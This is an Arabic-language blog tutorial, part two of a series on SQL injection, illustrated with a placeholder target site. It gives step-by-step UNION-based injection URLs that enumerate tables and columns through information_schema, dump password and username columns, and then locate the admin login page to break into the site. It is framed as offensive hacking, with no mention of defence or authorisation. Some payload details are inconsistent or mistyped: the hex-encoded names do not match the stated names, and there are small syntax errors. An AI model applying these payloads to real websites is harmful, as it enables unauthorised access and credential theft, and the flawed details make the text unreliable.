SQL INJECTION
الجزء الثاني
السلام عليكم ورحمة الله وبركاته في التدوينة السابقة قمت بشرح حول هذه الثغرة كما سجلت مقطع فيديو كي أوضح لك الشرح. والان وبعون لله تعالى تم شرح الجزء الثاني وهو مقسم الى قسمين قسم مصور و قسم التدوينة
القسم المموجود في التدوينة ما هو ألا شرح مبسط إضافة الى الأوامر المستخدمة في الشرح. نبدأ على بركة لله تعالى
قد تعلمنا في التدوينة السابقة كيفية أستخراج اسم القاعدة والان ما علينا سوى الذهاب وتشفير اسم القاعدة لأستخدامها
في الأوامر المراد اتخاذها في سبيل اختراق الموقع
لنفرض ان اسم القاعدة هو
Database Name: MacBook3arabi
ما عليك سوى نسخ اسم القاعدة والذهاب الى مواقع التشفير (رابط المواقع موجود أسفل المدونة) وبهذا تتم عملية التشفير
والأن ننتقل الى الأمر لأستخراج اسم الجدول من اسم القاعدة
لنفرض ان رابط الموقع المستهدف هو
www.victimsite.com/index.php?macbook3arabiId=30
وكان عدد الأعمدة عشرة والأعمدة المصابة هي أثنان و ثلاثة و خمسة
والأن ما علي سوى حذف إحدة الاعمدة الماصبة ولتكن اثنان وكتابة
concat(table_name)
وفي نهاية الرابط نكتب
from information_schema.tables where table_schema=0x6772776f726b5f6772776f726b666f726365
0x6772776f726b5f6772776f726b666f726365 اسم القاعدة المشفر
فيصبح الرابط كالتالي
www.victimsite.com/index.php?macbook3arabiId=-30 union select 1,concat(table_name),3,4,5from information_schema.tables where tables_schema= 0x6772776f726b5f6772776f726b666f726365--
ولنفرض ان اسم الجدول الموجود هو
Omar
والان نحتاج الى استخراج اسماء الاعمدة من اسم الجدول
Omar
اولا يجب علينا تشفير اسم الجدول باستخدام نفس الموقع (رابط الموقع موجود اسفل التدوينة) ثم
نضع بدل العمود المصاب الأمر التالي
group_concat(column_name)
وفي نهاية الرابط
--
0x63617465676f7279 اسم الجدول المشفر
فيصبح الرابط
http://victimesite.com/index.php?macbook3arabiId=-30 union select 1,group_concat(column_name)2,3,4,5
from information_schema.columns where table_name=0x63617465676f7279
--
والان يظهر لدينا اسماء الاعمدة الموجودة في الجدول
والان نختار اسم العمود المراد استخراج المعلومات منه ولنفرض اسم العمود هو
Password
وكتابة بعد الأمر بدل من اسم العمود المصاب
concat(password)
وفي نهاية الرابط
from omar--
منغير تشفير
victimsite.com/index.php?maccbok3arabiId=-30 union select 1,concat(password),3,4,5from omar--
والان تظهر لك الباسورد ثم تأخذ عمود اخر ولنفرض
User
وتسبدله بمكان الباسورد فيظهر لك اسم اليوزر
وبهذا تتوصل الى المعلومات بالنسبة للوصول الى لوحة التحكم فما عليك سوى البحث في محركات البحث مع استخدام جمل
victimsite.com/login.php
وغيرها حتى تصل الى لوحة التحكم وتدخل بينانات ثم تتم الاختراق بإذن لله تعالى
رابط الموقع التشفير
مشاهدة الجزء الأول مصور
مشاهدة الجزء الثاني مصور
https://www.youtube.com/watch?v=q6EWRUsy0RU
